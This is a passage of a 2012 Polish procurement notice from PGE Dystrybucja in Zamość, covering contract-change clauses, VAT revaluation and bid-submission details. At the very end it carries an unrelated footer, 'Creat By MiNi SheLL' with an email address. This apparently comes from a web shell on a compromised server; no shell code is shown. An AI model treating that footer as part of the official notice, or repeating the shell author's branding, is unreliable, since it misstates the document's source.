w szczególności klęsk żywiołowych, innych warunków atmosferycznych uniemożliwiających przeprowadzenie robót lub też wystąpienia, np. nieprzewidzianych awarii infrastruktury technicznej, wypadków drogowych, których skutki są trudne do usunięcia i zawieszenie wykonywania robót trwa dłużej niż 5 dni, epidemii, działań rządowych itp.,
22.2.6.	zmiany, o których mowa mogą prowadzić do zmiany terminu (przedłużenia lub skrócenia) realizacji zamówienia jak i rozwiązania umowy.
22.2.7.	Zamawiający może nie wyrazić zgody na dokonanie zmian postanowień umowy, jeżeli proponowana zmiana może wpłynąć na opóźnienie, obniżenie jakości lub zwiększenie kosztów w wykonywaniu zobowiązań umowy,
22.2.8.	Dopuszcza się zmianę kierownika budowy i inspektora nadzoru w sytuacji wystąpienia zdarzeń losowych lub nie wywiązywania się z obowiązków objętych umową. Nowo wybrany kierownik budowy / inspektor nadzoru przejmuje dotychczasowy stan inwestycji,
22.2.9.	Zmiana terminu wykonania zamówienia w przypadku: siły wyższej, jakiegokolwiek opóźnienia, utrudnienia lub przeszkód spowodowanych przez lub dających się przypisać Zamawiającemu lub innemu Wykonawcy zatrudnionemu przez Zamawiającego.
22.2.10.	Przedłużenie terminu wykonywania robót w wyniku opóźnienia spowodowanego: zawieszeniem robót przez Zamawiającego, wykopaliskami archeologicznymi uniemożliwiającymi wykonywanie robót, odmiennymi od przyjętych w dokumentacji projektowej warunkami geologicznymi (kategorie gruntu itp.), warunkami terenowymi ( w szczególności istnienie podziemnych urządzeń, instalacji, obiektów infrastrukturalnych, wystąpieniem niemożliwych do przewidzenia robót dodatkowych, których wykonanie jest niezbędne do zakończenia zamówienia podstawowego.
22.2.11.	Przedłużenie terminu realizacji umowy w związku z następstwem działania organów administracji np. odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej lub przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, itp.
22.2.12.	Zmiany są uzasadnione koniecznością zwiększenia bezpieczeństwa wykonania robót lub usprawnienia procesu budowy i nie wykraczają poza zakres zamówienia objętego postępowaniem przetargowym.
22.2.13.	inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac. Termin wykonania umowy może wówczas ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania przedmiotu umowy w sposób należyty. Przedłużenie terminu nie może jednak przekraczać okresu trwania tej okoliczności.
22.2.14.	Zamawiający przewiduje możliwość zmiany wynagrodzenia określonego 
w umowie w przypadku ustawowej zmiany podatku VAT, bez konieczności zmiany umowy. W takim przypadku wynagrodzenie należne Wykonawcy podlega automatycznej waloryzacji odpowiednio o kwotę podatku VAT wynikającą ze stawki tego podatku obowiązującą w chwili powstania obowiązku podatkowego.
Nie jest wymagane w tym przypadku zawarcie Aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamosc.pgedystrybucja.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> j.w..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2012 godzina 11:00, miejsce: PGE Dystrybucja S.A. Oddział Zamość, 22-400 Zamość ul. Koźmiana 1, w Wydziale Transportu, budynek B, pokój nr 1 nie później jak do dnia 
16.04.2012  r. godz. 11.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com